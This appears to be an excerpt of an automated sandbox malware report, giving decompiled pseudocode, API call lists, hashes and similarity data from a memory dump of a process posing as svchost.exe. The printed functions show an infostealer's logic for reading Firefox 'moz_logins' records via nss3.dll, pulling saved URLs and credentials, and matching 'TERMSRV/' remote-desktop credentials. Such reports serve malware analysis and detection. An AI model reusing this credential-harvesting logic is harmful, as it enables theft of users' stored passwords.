				CHAR* _t30;
				int _t32;
				CHAR* _t39;
				void* _t40;
				void* _t41;
				int _t42;

				_v12 = 0;
				_v16 = 0;
				_push(_a12);
				_pop( *_t4);
				_v8 = _v8 >> 1;
				_t24 = WideCharToMultiByte(0, 0, _a8, _v8, 0, 0, 0, 0);
				if(_t24 != 0) {
					_v12 = E10001888(_t24);
					_t42 = _t24;
					if(WideCharToMultiByte(0, 0, _a8, _v8, _v12, _t42, 0, 0) == 0) {
						E10001871(_v12);
						_v12 = 0;
					}
				}
				if(_v12 == 0) {
					L12:
					E10001871(_v12);
					return _v16;
				} else {
					_t28 = StrStrIA(_v12, _a4);
					if(_t28 == 0) {
						goto L12;
					}
					_t29 = lstrlenA(_a4);
					_t40 = _t28;
					_t30 = _t29 + _t40;
					_t39 = _t30;
					while( *_t30 != 0) {
						if( *_t30 != 0xd) {
							_t30 =  &(_t30[1]);
							continue;
						}
						 *_t30 = 0;
						_t32 = lstrlenA(_t39);
						if(_t32 != 0) {
							_v16 = E10001888(_t32);
							_t41 = _t32;
							E100018BF(_t39, _v16, _t41);
						}
						goto L12;
					}
					goto L12;
				}
			}















                                                                                                                                        0x10009ce5
                                                                                                                                        0x10009cec
                                                                                                                                        0x10009cf3
                                                                                                                                        0x10009cf6
                                                                                                                                        0x10009cf9
                                                                                                                                        0x10009d13
                                                                                                                                        0x10009d15
                                                                                                                                        0x10009d1e
                                                                                                                                        0x10009d21
                                                                                                                                        0x10009d3b
                                                                                                                                        0x10009d40
                                                                                                                                        0x10009d45
                                                                                                                                        0x10009d45
                                                                                                                                        0x10009d3b
                                                                                                                                        0x10009d50
                                                                                                                                        0x10009da0
                                                                                                                                        0x10009da3
                                                                                                                                        0x10009dad
                                                                                                                                        0x10009d52
                                                                                                                                        0x10009d5d
                                                                                                                                        0x10009d5f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10009d65
                                                                                                                                        0x10009d6a
                                                                                                                                        0x10009d6b
                                                                                                                                        0x10009d6d
                                                                                                                                        0x10009d9b
                                                                                                                                        0x10009d74
                                                                                                                                        0x10009d9a
                                                                                                                                        0x00000000
                                                                                                                                        0x10009d9a
                                                                                                                                        0x10009d76
                                                                                                                                        0x10009d7f
                                                                                                                                        0x10009d81
                                                                                                                                        0x10009d8a
                                                                                                                                        0x10009d8d
                                                                                                                                        0x10009d93
                                                                                                                                        0x10009d93
                                                                                                                                        0x00000000
                                                                                                                                        0x10009d98
                                                                                                                                        0x00000000
                                                                                                                                        0x10009d9b

                                                                                                                                        APIs
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 10009D0E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 10009D34
                                                                                                                                        • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 10009D58
                                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 10009D7A
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 10009D65
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1890766102-0
                                                                                                                                        • Opcode ID: 6c6baffc20a93782d56cb2dc29d5ee3b2331f29915738ce41732d3b9d000acb3
                                                                                                                                        • Instruction ID: 78e0178545d1deb71194f67004166d5b4780c43b74b178ecedbdf09122fb2ba5
                                                                                                                                        • Opcode Fuzzy Hash: 6c6baffc20a93782d56cb2dc29d5ee3b2331f29915738ce41732d3b9d000acb3
                                                                                                                                        • Instruction Fuzzy Hash: BB215B76D44208BEFF11DFA0CC42B9D7BB5EB01380F208095B610A90EADAB5AA509B25
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 10006343, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 110UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10006343(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char** _a16) {
				char* _v8;
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				void* _t47;
				char* _t49;
				char** _t50;
				char* _t70;
				void* _t72;
				char* _t73;
				char* _t74;
				char* _t75;
				char* _t76;
				void* _t77;

				_t77 = __eflags;
				_t72 = __edx;
				_t71 = __ecx;
				E10001424(_t47, __ecx, _a4, 1, _a16);
				_t49 = E100013A0(_t77, _a4, _a16);
				_t75 = _t49;
				while(1) {
					_t76 = _t75;
					if(_t76 == 0) {
						break;
					}
					_t50 = _a16;
					__eflags =  *_t50;
					if( *_t50 == 0) {
						return _t50;
					}
					_v8 = 0;
					_t73 = E10006282(_t71, _t72, _a4, _a12, _a16,  &_v8);
					__eflags = _v8;
					if(_v8 == 0) {
						_v24 = 0;
					} else {
						_t70 = StrStrIA(_v8, "http://");
						__eflags = _t70;
						if(_t70 == 0) {
							_t70 = StrStrIA(_v8, "https://");
						}
						_v24 = _t70;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E10001522(_a8, 0xbeef0001);
						E10001584(_a8, _v8);
					}
					while(1) {
						_t74 = _t73;
						__eflags = _t74;
						if(_t74 == 0) {
							break;
						}
						__eflags =  *_a16;
						if( *_a16 != 0) {
							_v12 = 0;
							_v16 = 0;
							_v20 = 0;
							E100062FF(_t72, _a4, _a16,  &_v12,  &_v16,  &_v20);
							__eflags = _v24;
							if(_v24 != 0) {
								__eflags = _v12;
								if(_v12 != 0) {
									__eflags = _v16;
									if(_v16 != 0) {
										L17:
										E10001584(_a8, _v12);
										E10001584(_a8, _v16);
										E10001584(_a8, _v20);
									} else {
										__eflags = _v20;
										if(_v20 != 0) {
											goto L17;
										}
									}
								}
							}
							E10001871(_v12);
							E10001871(_v16);
							E10001871(_v20);
							_t73 = _t74 - 1;
							__eflags = _t73;
							continue;
						} else {
						}
						break;
					}
					__eflags = _v24;
					if(_v24 != 0) {
						E10001522(_a8, 0);
						E10001522(_a8, 0);
						E10001522(_a8, 0);
					}
					_t49 = E10001871(_v8);
					_t75 = _t76 - 1;
					__eflags = _t75;
				}
				return _t49;
			}


















                                                                                                                                        0x10006343
                                                                                                                                        0x10006343
                                                                                                                                        0x10006343
                                                                                                                                        0x10006353
                                                                                                                                        0x1000635e
                                                                                                                                        0x10006363
                                                                                                                                        0x100064a5
                                                                                                                                        0x100064a5
                                                                                                                                        0x100064a7
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000636a
                                                                                                                                        0x1000636d
                                                                                                                                        0x10006370
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10006377
                                                                                                                                        0x10006390
                                                                                                                                        0x10006392
                                                                                                                                        0x10006396
                                                                                                                                        0x100063bb
                                                                                                                                        0x10006398
                                                                                                                                        0x100063a5
                                                                                                                                        0x100063a5
                                                                                                                                        0x100063a7
                                                                                                                                        0x100063b1
                                                                                                                                        0x100063b1
                                                                                                                                        0x100063b6
                                                                                                                                        0x100063b6
                                                                                                                                        0x100063c2
                                                                                                                                        0x100063c6
                                                                                                                                        0x100063d0
                                                                                                                                        0x100063db
                                                                                                                                        0x100063db
                                                                                                                                        0x10006470
                                                                                                                                        0x10006470
                                                                                                                                        0x10006470
                                                                                                                                        0x10006472
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100063e8
                                                                                                                                        0x100063eb
                                                                                                                                        0x100063f2
                                                                                                                                        0x100063f9
                                                                                                                                        0x10006400
                                                                                                                                        0x10006419
                                                                                                                                        0x1000641e
                                                                                                                                        0x10006422
                                                                                                                                        0x10006424
                                                                                                                                        0x10006428
                                                                                                                                        0x1000642a
                                                                                                                                        0x1000642e
                                                                                                                                        0x10006436
                                                                                                                                        0x1000643c
                                                                                                                                        0x10006447
                                                                                                                                        0x10006452
                                                                                                                                        0x10006430
                                                                                                                                        0x10006430
                                                                                                                                        0x10006434
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10006434
                                                                                                                                        0x1000642e
                                                                                                                                        0x10006428
                                                                                                                                        0x1000645a
                                                                                                                                        0x10006462
                                                                                                                                        0x1000646a
                                                                                                                                        0x1000646f
                                                                                                                                        0x1000646f
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x100063ed
                                                                                                                                        0x00000000
                                                                                                                                        0x100063eb
                                                                                                                                        0x10006478
                                                                                                                                        0x1000647c
                                                                                                                                        0x10006483
                                                                                                                                        0x1000648d
                                                                                                                                        0x10006497
                                                                                                                                        0x10006497
                                                                                                                                        0x1000649f
                                                                                                                                        0x100064a4
                                                                                                                                        0x100064a4
                                                                                                                                        0x100064a4
                                                                                                                                        0x100064b0

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: http://$https://
                                                                                                                                        • API String ID: 0-1916535328
                                                                                                                                        • Opcode ID: a6f3ef33fa48eda91d21e18c70ee1c8a90481d2cd27522ed316cd4034c8a4803
                                                                                                                                        • Instruction ID: 45625fe57a9373ec33681c301f71a1e87fd2e83f183d2876e78200251caff44e
                                                                                                                                        • Opcode Fuzzy Hash: a6f3ef33fa48eda91d21e18c70ee1c8a90481d2cd27522ed316cd4034c8a4803
                                                                                                                                        • Instruction Fuzzy Hash: A941D475800509FAEF12DF90CD05BDE7BB6EF48395F208161F911790A9CB729B60EB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Function 10009778, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 87stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                        			E10009778(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v8;
				char _v12;
				CHAR* _v16;
				CHAR* _v20;
				intOrPtr _v24;
				char _v28;
				int _t35;
				void* _t54;

				_t54 = __ecx;
				if(_a16 == 5) {
					_t35 = E10008860(_a12, 2,  &_v8,  &_v12,  &_v16);
					if(_v12 == 1) {
						_push(_v16);
						_pop( *_t8);
						_t35 = lstrcmpiA(_v20, "moz_logins");
						if(_t35 == 0) {
							_t35 = E10008860(_a12, 0,  &_v8,  &_v12,  &_v16);
							if(_v12 == 1) {
								_t35 = lstrcmpA("table", _v16);
								if(_t35 == 0) {
									_t35 = E10008860(_a12, 3,  &_v8,  &_v12,  &_v16);
									if(_v12 == 0) {
										 *_t22 =  *_v16;
										_t35 = E10008860(_a12, 4,  &_v8,  &_v12,  &_v16);
										if(_v12 == 1) {
											 *0x10012e98 = 0xffffffff;
											 *0x10012e9c = 0xffffffff;
											 *0x10012ea0 = 0xffffffff;
											_t35 = E10008D4F(_v16, E100094F8);
											_v28 = 1;
											if( *0x10012e98 != 0xffffffff &&  *0x10012e9c != 0xffffffff &&  *0x10012ea0 != 0xffffffff) {
												return E10008A44(__ebx, _t54, _a4, _a8, _v24,  &_v28, _a20, E100095B3);
											}
										}
									}
								}
							}
						}
					}
				}
				return _t35;
			}











                                                                                                                                        0x10009778
                                                                                                                                        0x10009782
                                                                                                                                        0x10009799
                                                                                                                                        0x100097a2
                                                                                                                                        0x100097a8
                                                                                                                                        0x100097ab
                                                                                                                                        0x100097bb
                                                                                                                                        0x100097bd
                                                                                                                                        0x100097d4
                                                                                                                                        0x100097dd
                                                                                                                                        0x100097f0
                                                                                                                                        0x100097f2
                                                                                                                                        0x10009809
                                                                                                                                        0x10009812
                                                                                                                                        0x1000981d
                                                                                                                                        0x10009831
                                                                                                                                        0x1000983a
                                                                                                                                        0x1000983c
                                                                                                                                        0x10009846
                                                                                                                                        0x10009850
                                                                                                                                        0x10009862
                                                                                                                                        0x10009867
                                                                                                                                        0x10009875
                                                                                                                                        0x00000000
                                                                                                                                        0x1000989e
                                                                                                                                        0x10009875
                                                                                                                                        0x1000983a
                                                                                                                                        0x10009812
                                                                                                                                        0x100097f2
                                                                                                                                        0x100097dd
                                                                                                                                        0x100097bd
                                                                                                                                        0x100097a2
                                                                                                                                        0x100098a4

                                                                                                                                        APIs
                                                                                                                                        • lstrcmpiA.KERNEL32(00000000,moz_logins,?), ref: 100097B6
                                                                                                                                        • lstrcmpA.KERNEL32(table,?,00000000,moz_logins,?), ref: 100097EB
                                                                                                                                          • Part of subcall function 10008D4F: StrStrIA.SHLWAPI(?,() ), ref: 10008D5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcmplstrcmpi
                                                                                                                                        • String ID: moz_logins$table
                                                                                                                                        • API String ID: 3524194181-1174185386
                                                                                                                                        • Opcode ID: 6235dfbe8acf73d84a16f6a1191e673150b9a5f36fd032f04c1c3cdfe470f0f2
                                                                                                                                        • Instruction ID: 8766c4113a74eed29c177fc2f6840d36515eac125493c5b3b680b57d8cab40e7
                                                                                                                                        • Opcode Fuzzy Hash: 6235dfbe8acf73d84a16f6a1191e673150b9a5f36fd032f04c1c3cdfe470f0f2
                                                                                                                                        • Instruction Fuzzy Hash: 6B31D87680060EFEEF11DFD0CC81ADE7BB9EB053A4F108263F621A11A4DB719B659B51
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.27%

                                                                                                                                        Function 10001AA5, Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                        			E10001AA5(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v280;
				signed int _v284;
				void* __ebx;
				void* __ebp;
				signed int _t27;
				void* _t29;
				signed int _t44;
				signed int _t46;
				void* _t48;
				void* _t49;

				_t49 = __edx;
				_t48 = __ecx;
				_t27 = GetTickCount();
				asm("rol eax, 0xb");
				_v284 =  !_t27;
				_t46 = 0;
				_t29 =  &_v8;
				_push(_t29);
				_push(_a4);
				L1000BA64();
				if(_t29 >= 0) {
					_v16 = E10001091(_t29, 0, _t49, _a4);
					_t29 = GlobalLock(_v8);
					_t51 = _t29;
					if(_t29 != 0) {
						_v20 = _t29;
						_v12 = E10001888(_v16);
						E100018BF(_v20, _v12, _v16);
						GlobalUnlock(_v8);
						E100018F8(_t48, _t51,  &_v280,  &_v284, 4);
						E10001356(E10001963( &_v280, _v12, _v16), _t49, _a4);
						_t44 = E10001537(_a4,  &_v284, 4);
						_t46 = _t44 & E10001537(_a4, _v12, _v16);
						_t29 = E10001871(_v12);
					}
				}
				E100012C2(_t29, _t49, _a4);
				return _t46;
			}

















                                                                                                                                        0x10001aa5
                                                                                                                                        0x10001aa5
                                                                                                                                        0x10001aaf
                                                                                                                                        0x10001ab4
                                                                                                                                        0x10001ab9
                                                                                                                                        0x10001abf
                                                                                                                                        0x10001ac1
                                                                                                                                        0x10001ac4
                                                                                                                                        0x10001ac5
                                                                                                                                        0x10001ac8
                                                                                                                                        0x10001acf
                                                                                                                                        0x10001add
                                                                                                                                        0x10001ae8
                                                                                                                                        0x10001ae8
                                                                                                                                        0x10001aea
                                                                                                                                        0x10001aec
                                                                                                                                        0x10001af7
                                                                                                                                        0x10001b03
                                                                                                                                        0x10001b0b
                                                                                                                                        0x10001b20
                                                                                                                                        0x10001b3a
                                                                                                                                        0x10001b4b
                                                                                                                                        0x10001b60
                                                                                                                                        0x10001b65
                                                                                                                                        0x10001b65
                                                                                                                                        0x10001aea
                                                                                                                                        0x10001b6d
                                                                                                                                        0x10001b76

                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 10001AAF
                                                                                                                                        • GetHGlobalFromStream.OLE32(?,?), ref: 10001AC8
                                                                                                                                        • GlobalLock.KERNEL32 ref: 10001AE3
                                                                                                                                          • Part of subcall function 10001888: LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        • GlobalUnlock.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 10001B0B
                                                                                                                                          • Part of subcall function 10001871: LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$Local$AllocCountFreeFromLockStreamTickUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1884134869-0
                                                                                                                                        • Opcode ID: f1c3c5b37fb19633b0725655b1e50c477201b53d3c350e0c96f40103fa37c1e7
                                                                                                                                        • Instruction ID: 79d8da5de4093af4f146a3148d76f255256cdde76f08967eb5979a88364bb469
                                                                                                                                        • Opcode Fuzzy Hash: f1c3c5b37fb19633b0725655b1e50c477201b53d3c350e0c96f40103fa37c1e7
                                                                                                                                        • Instruction Fuzzy Hash: 42219779D0060DBEEF01DFA0CC429EDBB79EF14380F0080B1BA15A5166DB72AB959B54
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.13%

                                                                                                                                        Function 10009B9C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10009B9C(void* __eflags, intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				int _v12;
				char* _t29;
				char* _t32;

				E10001522(_a4, 0xbeef0000);
				E10001584(_a4, _a8);
				E10001584(_a4, _a12);
				E10001558(_a4, _a16, _a20);
				_t29 = StrStrIA(_a12, 0x10010616);
				if(_t29 == 0) {
					_v12 = lstrlenA("TERMSRV/");
					_t32 = StrStrIA(_a12, "TERMSRV/");
					if(_t32 != 0) {
						_a12 = _t32;
					}
					_t29 = E100038E3(_t32, _a12);
					if(_t29 != 0xffffffff) {
						_v8 = _t29;
						E10001522(_a4, 0xbeef0001);
						E10001584(_a4, _a8);
						E10001522(_a4, _v8);
						return E10001558(_a4, _a16, _a20);
					}
				}
				return _t29;
			}







                                                                                                                                        0x10009baa
                                                                                                                                        0x10009bb5
                                                                                                                                        0x10009bc0
                                                                                                                                        0x10009bce
                                                                                                                                        0x10009be0
                                                                                                                                        0x10009be2
                                                                                                                                        0x10009bee
                                                                                                                                        0x10009bfe
                                                                                                                                        0x10009c00
                                                                                                                                        0x10009c05
                                                                                                                                        0x10009c05
                                                                                                                                        0x10009c0b
                                                                                                                                        0x10009c13
                                                                                                                                        0x10009c15
                                                                                                                                        0x10009c20
                                                                                                                                        0x10009c2b
                                                                                                                                        0x10009c36
                                                                                                                                        0x00000000
                                                                                                                                        0x10009c44
                                                                                                                                        0x10009c13
                                                                                                                                        0x10009c4a

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10001584: lstrlenA.KERNEL32(00000000), ref: 10001590
                                                                                                                                        • StrStrIA.SHLWAPI(?,10010616), ref: 10009BDB
                                                                                                                                        • lstrlenA.KERNEL32(TERMSRV/,?,10010616), ref: 10009BE9
                                                                                                                                        • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,10010616), ref: 10009BF9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen
                                                                                                                                        • String ID: TERMSRV/
                                                                                                                                        • API String ID: 1659193697-3001602198
                                                                                                                                        • Opcode ID: ec62d3a2cfef1f6baf57d910c6318e8da3a17e9334daa00a67563e55e0a947ce
                                                                                                                                        • Instruction ID: 6521309b09e7377a96dac9afdb510a9f00e9e9fc81b6481f4269f0f333f3ab6e
                                                                                                                                        • Opcode Fuzzy Hash: ec62d3a2cfef1f6baf57d910c6318e8da3a17e9334daa00a67563e55e0a947ce
                                                                                                                                        • Instruction Fuzzy Hash: 6311BE39500509FBEF02DF60CC02CDD3E62EF942D5F008520F92569179DB32DA71AB91
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 10001E05, Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001E05(CHAR* _a4, CHAR* _a8) {
				int _t11;
				CHAR* _t21;

				if(_a4 == 0) {
					_a4 = 0x1000f137;
				}
				if(_a8 == 0) {
					_a8 = 0x1000f137;
				}
				_t11 = lstrlenA(_a4);
				_t21 = E10001888(_t11 + lstrlenA(_a8) + 1);
				lstrcpyA(_t21, _a4);
				lstrcatA(_t21, _a8);
				if(_a4 != 0x1000f137) {
					E10001871(_a4);
				}
				return _t21;
			}





                                                                                                                                        0x10001e0d
                                                                                                                                        0x10001e0f
                                                                                                                                        0x10001e0f
                                                                                                                                        0x10001e1a
                                                                                                                                        0x10001e1c
                                                                                                                                        0x10001e1c
                                                                                                                                        0x10001e26
                                                                                                                                        0x10001e3e
                                                                                                                                        0x10001e44
                                                                                                                                        0x10001e4d
                                                                                                                                        0x10001e59
                                                                                                                                        0x10001e5e
                                                                                                                                        0x10001e5e
                                                                                                                                        0x10001e67

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 10001E26
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?), ref: 10001E30
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001E44
                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001E4D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2414487701-0
                                                                                                                                        • Opcode ID: 9cf6951446215fd1d2701c6af4dee223a20300874e390592d976d891848374ec
                                                                                                                                        • Instruction ID: 7f3b1b3484b2eb4873805575de42fe188f31a9bbefd6b31d00f173742ed160b4
                                                                                                                                        • Opcode Fuzzy Hash: 9cf6951446215fd1d2701c6af4dee223a20300874e390592d976d891848374ec
                                                                                                                                        • Instruction Fuzzy Hash: C3F05E79504248FFFF01DF60DC81AED3A68EB003D4F40D024BD0A0916AD7B9DA919B80
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        Function 10001DB1, Relevance: 6.0, APIs: 4, Instructions: 29stringCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001DB1(CHAR* _a4, CHAR* _a8) {
				int _t9;
				CHAR* _t18;

				if(_a4 == 0) {
					_a4 = 0x1000f137;
				}
				if(_a8 == 0) {
					_a8 = 0x1000f137;
				}
				_t9 = lstrlenA(_a4);
				_t18 = E10001888(_t9 + lstrlenA(_a8) + 1);
				lstrcpyA(_t18, _a4);
				lstrcatA(_t18, _a8);
				return _t18;
			}





                                                                                                                                        0x10001db9
                                                                                                                                        0x10001dbb
                                                                                                                                        0x10001dbb
                                                                                                                                        0x10001dc6
                                                                                                                                        0x10001dc8
                                                                                                                                        0x10001dc8
                                                                                                                                        0x10001dd2
                                                                                                                                        0x10001dea
                                                                                                                                        0x10001df0
                                                                                                                                        0x10001df9
                                                                                                                                        0x10001e02

                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 10001DD2
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?), ref: 10001DDC
                                                                                                                                        • lstrcpyA.KERNEL32(00000000,?,00000000,00000000,?), ref: 10001DF0
                                                                                                                                        • lstrcatA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?), ref: 10001DF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$lstrcatlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2414487701-0
                                                                                                                                        • Opcode ID: dd610432dba21a021446962a42ad08a8ea13270dc0c1f3f7a46167556c47ee14
                                                                                                                                        • Instruction ID: 13c8597b78641e80ec1cccf96a04110a81c14722b9c0c40447442d353750631f
                                                                                                                                        • Opcode Fuzzy Hash: dd610432dba21a021446962a42ad08a8ea13270dc0c1f3f7a46167556c47ee14
                                                                                                                                        • Instruction Fuzzy Hash: 43F0657950020CBFFB01DF60CCC1AED3B99EB013D4F40D425B95A0911ADB79DA41DB90
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        Function 10006B0B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51stringUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 10006B1E
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(?,?), ref: 10006B3F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectorylstrlen
                                                                                                                                        • String ID: nss3.dll
                                                                                                                                        • API String ID: 2713697268-2492180550
                                                                                                                                        • Opcode ID: 2036903b1e9e829fca20be8137a913b3f3cf83304650f3e647b358dc5b0a22be
                                                                                                                                        • Instruction ID: 2f9eb9b90f96e9689555ecb7f741337473ad1d4c7f9fb1f1f9b943e094417523
                                                                                                                                        • Opcode Fuzzy Hash: 2036903b1e9e829fca20be8137a913b3f3cf83304650f3e647b358dc5b0a22be
                                                                                                                                        • Instruction Fuzzy Hash: D6110CB1700161BFF711EF64CC89B093FA3FB5A395F208024F585D9269E7FAC9948646
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 100.00%

                                                                                                                                        Analysis Process: svchost.exe PID: 3708 Parent PID: 5128 svchost.exeUNIQUE

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:32%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:9.4%
                                                                                                                                        Total number of Nodes:1655
                                                                                                                                        Total number of Limit Nodes:30

                                                                                                                                        Graph

